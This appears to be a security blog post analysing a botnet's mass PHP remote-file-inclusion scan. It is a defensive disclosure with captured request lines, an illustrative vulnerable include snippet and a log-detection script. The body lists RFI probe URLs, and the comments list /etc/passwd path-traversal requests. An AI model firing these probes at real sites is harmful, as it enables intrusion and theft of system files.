Massive PHP RFI scans
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scan. Yinette has been seeing this activity for quite some time, and the number of requests sent by this (as yet unidentified) bot or botnet keeps rising.
Judging by the source IP addresses, the bots appear to be running on compromised web servers with typical cPanel installations and large numbers of hosted virtual servers.
The scanning is relatively fast: in the capture Yinette made, the bot consistently sent at least two requests per second. Every request tries to exploit an RFI vulnerability (I haven't verified all of them yet, but a cursory inspection suggests most are well known), and the file included is always the static humans.txt file on Google (http://www.google.com/humans.txt).
The bot almost certainly parses the output: if it sees the contents of the humans.txt file in the response, it knows the site has an RFI (Remote File Inclusion) vulnerability. Google's availability and uptime help, of course.
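To illustrate the technique, here is a hypothetical sketch (in PHP, not taken from any particular product) of the kind of vulnerable pattern these requests probe for; the phpbb_root_path parameter name is borrowed from the requests below, but the snippet itself is purely illustrative:

<?php
// Hypothetical vulnerable include - illustrative only, not code from any
// specific application. With allow_url_fopen and allow_url_include enabled,
// PHP will fetch and include a remote URL supplied by the attacker.
$phpbb_root_path = $_GET['phpbb_root_path'];   // attacker sends http://www.google.com/humans.txt?
include($phpbb_root_path . 'common.php');
// This becomes include('http://www.google.com/humans.txt?common.php').
// The trailing "?" in the injected value turns the appended file name into a
// query string, so only humans.txt is fetched and its text appears in the
// page output - exactly what the bot looks for in the response.
?>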
Some observed requests are shown below:
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
This is only a small part of all the requests the bot sends. In total, it sent 804 requests to Yinette's web site (that's 804 vulnerabilities it's trying to exploit)! This might well be someone trying to build a big(ger) botnet.
Are you seeing the same or similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!
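If you want to check your own logs for this activity, a rough sketch along the following lines should do (it assumes an Apache combined-format access log at the path shown in the code – adjust for your own setup):

<?php
// Rough detection sketch, not a polished tool. Counts requests whose URI
// points an include parameter at Google's humans.txt - the signature of
// this particular scan - grouped by source IP.
$log = '/var/log/apache2/access.log';          // assumed log location
$hits = array();
foreach (file($log) as $line) {
    if (stripos($line, 'google.com/humans.txt') !== false) {
        $ip = strtok($line, ' ');              // client IP is the first field
        $hits[$ip] = isset($hits[$ip]) ? $hits[$ip] + 1 : 1;
    }
}
arsort($hits);
foreach ($hits as $ip => $count) {
    echo "$ip : $count request(s)\n";
}
?>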
UPDATE:
We received a lot of submissions regarding this – thanks to everyone who sent in their logs and observations! After analyzing the logs we received, it appears that these scans started around the 21st of December 2013 and are still going on.
Also, the capture Yinette made appears to cover only part of the attack. We received several submissions showing the exact requests (which, fortunately, resulted in 404 errors for most of them :).
The total number of requests is even higher – the bot tries to access 2217 (!!!) URIs. Every URI accessed targets an RFI vulnerability, and the requests always (at least in these attacks) try to retrieve the humans.txt file from Google (it would be interesting if someone at Google could analyze their logs of requests for this file).
So, this is getting pretty large. Unfortunately, we haven't seen the bot's code so far – if you do manage to catch it, please upload it through our contact form so we can analyze it.
Comments
"GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0"
"GET /irsr/authenticate/sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0"
etc., etc.
Anonymous
Jan 10th 2014